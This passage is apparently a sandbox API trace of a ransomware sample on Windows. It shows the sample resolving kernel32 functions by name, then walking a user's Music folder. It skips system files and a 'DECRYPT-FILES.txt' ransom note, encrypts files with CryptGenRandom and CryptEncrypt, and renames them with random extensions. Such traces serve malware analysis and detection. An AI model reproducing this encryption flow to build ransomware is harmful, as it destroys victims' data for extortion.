returned="CreatePrivateNamespaceW" [0085.698] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.698] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.698] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.698] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.698] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.698] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.698] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.698] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.699] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.699] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.699] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.699] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.699] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.699] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.699] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.699] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.699] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.699] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.699] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.699] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.699] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.699] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.699] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.699] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.699] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.699] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.699] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.700] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.700] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.700] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.700] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.700] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.700] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.700] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.700] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.700] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.700] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.700] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.700] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.700] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.700] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.700] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.700] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.700] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.700] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.700] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.701] lstrlenA (lpString="DELETEATOM") returned 10 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.701] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.701] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.701] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.701] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.701] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.701] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.701] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.701] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.701] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.701] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.701] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.701] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.701] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.701] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.701] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.701] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.701] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.702] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.702] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.702] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.702] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.702] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.702] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.702] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.702] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.702] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.702] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.702] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.702] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.702] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.702] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.702] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.702] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.702] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.702] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.702] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.702] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.703] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.703] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.703] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.703] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.703] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.703] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.703] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.703] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.703] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.703] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.703] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.703] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.703] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\cK A cQIxO.wav") returned 75 [0085.704] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\cK A cQIxO.wav.62li") returned 80 [0085.704] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\cK A cQIxO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\ck a cqixo.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\cK A cQIxO.wav.62li" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\ck a cqixo.wav.62li"), dwFlags=0x0) returned 1 [0085.704] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.704] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.705] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.705] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa2a510, ftCreationTime.dwHighDateTime=0x1d4c8f2, ftLastAccessTime.dwLowDateTime=0xf7f685d0, ftLastAccessTime.dwHighDateTime=0x1d4d159, ftLastWriteTime.dwLowDateTime=0xf7f685d0, ftLastWriteTime.dwHighDateTime=0x1d4d159, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x0, dwReserved1=0x0, cFileName="clV-4ix.mp3", cAlternateFileName="")) returned 1 [0085.705] lstrcmpiW (lpString1="clV-4ix.mp3", lpString2="DECRYPT-FILES.txt") returned -1 [0085.705] lstrcmpiW (lpString1="clV-4ix.mp3", lpString2="autorun.inf") returned 1 [0085.705] lstrcmpiW (lpString1="clV-4ix.mp3", lpString2="boot.ini") returned 1 [0085.705] lstrcmpiW (lpString1="clV-4ix.mp3", lpString2="desktop.ini") returned -1 [0085.705] lstrcmpiW (lpString1="clV-4ix.mp3", lpString2="ntuser.dat") returned -1 [0085.705] lstrcmpiW (lpString1="clV-4ix.mp3", lpString2="iconcache.db") returned -1 [0085.705] lstrcmpiW (lpString1="clV-4ix.mp3", lpString2="bootsect.bak") returned 1 [0085.705] lstrcmpiW (lpString1="clV-4ix.mp3", lpString2="ntuser.dat.log") returned -1 [0085.705] lstrcmpiW (lpString1="clV-4ix.mp3", lpString2="thumbs.db") returned -1 [0085.705] lstrcmpiW (lpString1="clV-4ix.mp3", lpString2="Bootfont.bin") returned 1 [0085.705] lstrlenW (lpString="clV-4ix.mp3") returned 11 [0085.705] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.705] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.705] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.705] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.705] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0085.705] lstrlenW (lpString="clV-4ix.mp3") returned 11 [0085.705] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0085.705] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="clV-4ix.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\clV-4ix.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\clV-4ix.mp3" [0085.705] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.706] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\clV-4ix.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\clv-4ix.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.706] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=2596) returned 1 [0085.706] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.706] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.706] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.706] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.706] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.706] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.707] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.707] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.707] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.708] CloseHandle (hObject=0x43c) returned 1 [0085.708] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.708] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.708] CloseHandle (hObject=0x0) returned 0 [0085.708] CloseHandle (hObject=0x438) returned 1 [0085.709] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.709] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.709] GetTickCount () returned 0x114de20 [0085.709] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.709] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.709] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.710] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.710] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.710] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\clV-4ix.mp3") returned 72 [0085.710] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\clV-4ix.mp3.o10v") returned 77 [0085.710] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\clV-4ix.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\clv-4ix.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\clV-4ix.mp3.o10v" (normalized: 